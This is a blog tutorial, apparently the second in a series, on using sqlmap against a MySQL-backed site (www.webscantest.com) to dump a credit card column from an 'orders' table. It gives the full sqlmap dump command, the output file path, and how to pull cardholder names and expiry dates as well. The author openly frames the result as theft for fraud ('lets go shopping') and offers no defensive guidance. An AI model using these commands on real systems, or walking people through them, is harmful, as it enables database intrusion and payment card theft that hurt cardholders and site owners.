top of page
Writer's picturealvin gitonga

SqlmapšŸ˜ˆ: Leaking sensitive infošŸ¤« on MySQL & WordPress SitesšŸ˜‰

CybermoransšŸ¤—

Earlier, In part 1 šŸ‘† I showed you the SQL injection: most common method of hacking online databases and how to use it against a MySQL database ā˜ ļø with Sqlmap šŸ˜ In this post, we will look at how to extract the key data from that database, the ultimate goal?....data leaks!šŸ˜ˆ....think the source of data for wikileaks....panama leaks...BGFI bank leaks....cyprus papers...leaks are done by whistleblowers and activist hacker groups šŸ¦¹ā€ā™‚ļø

The first step was to do reconnaissance on the database using google dorks to find it and sqlmap to scan for the data we need šŸ‘‡


1. šŸ‘‰ database management system (DBMS)

2. šŸ‘‰ database name

3. šŸ‘‰ tables

4. šŸ‘‰ name of the column whose data we seek


In the previous tutorial, we acquired all that info by scanning a website called www.webscantest.com.


You can go back šŸ‘ˆ to the previous article to see how we did it. Now though, we use that data we got during recon to exfiltrate sensitive info from the databasešŸ˜ˆ


Morans, Lets do this..šŸ’Ŗ


Ā 

Extracting Data šŸš€

Now we have all the key information we need, it's time to extract that credit card information. Navigate to the help screen for sqlmap by entering šŸ‘‡

sqlmap --help

see šŸ‘†, we need to use the --dump option in sqlmap along with the column and table name. Such as;

  • --dump

  • -C billing_CC_number

  • -T orders

  • -D webscantest


Put all that data together and see whether we can extract that credit card data from the database šŸ‘‡

sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dump -C billing_CC_number -T orders -D webscantest


šŸ‘† sqlmap has extracted then dumped the data to my Kali system in a .csv format and saved it to šŸ‘‡

 /root/.sqlmap/output/www.webscantest.com/dump/webscantest/orders.csv

Now, we have all the credit card data in a .csv file format that can be opened in Excel, a text editor or any spreadsheet program...lets go shoppingšŸ˜

šŸ˜ˆ You have successfully compromised a back-end database from a web application using SQL Injection techniques and, most of all, we were able to extract key data from the databaseā˜ ļø

If we need more data such as expiration dates or first name and last name, we can extract that data by simply replacing the credit card column name in our sqlmap command with the appropriate column namešŸ‘½ (e.g. billing_firstname) in the tablešŸ§

Ā 

Conclusion šŸ¤–

Subscribe to receive notifications of similar posts šŸ˜œ where we will be reverse engineering malware and the technical aspect of vulnerabilities as well as how an attacker may use this vulnerability as an attack vector and other Infosec stuff...šŸ˜‹


Morans,

Thank you for your time, Like and leave a comment/review and as always, stay awesome! šŸ˜‹šŸ‘Š šŸ’Ŗ


246 views2 comments

Recent Posts

See All

2ä»¶ć®ć‚³ćƒ”ćƒ³ćƒˆ


Weldon Kenei
Weldon Kenei
2022幓11꜈28ę—„

Amazing article šŸ’Æ

恄恄恭ļ¼
alvin gitonga
alvin gitonga
2022幓12꜈11ę—„
čæ”äæ”先

thanks...I will keep them comingšŸ˜†

恄恄恭ļ¼
Post: Blog2_Post
bottom of page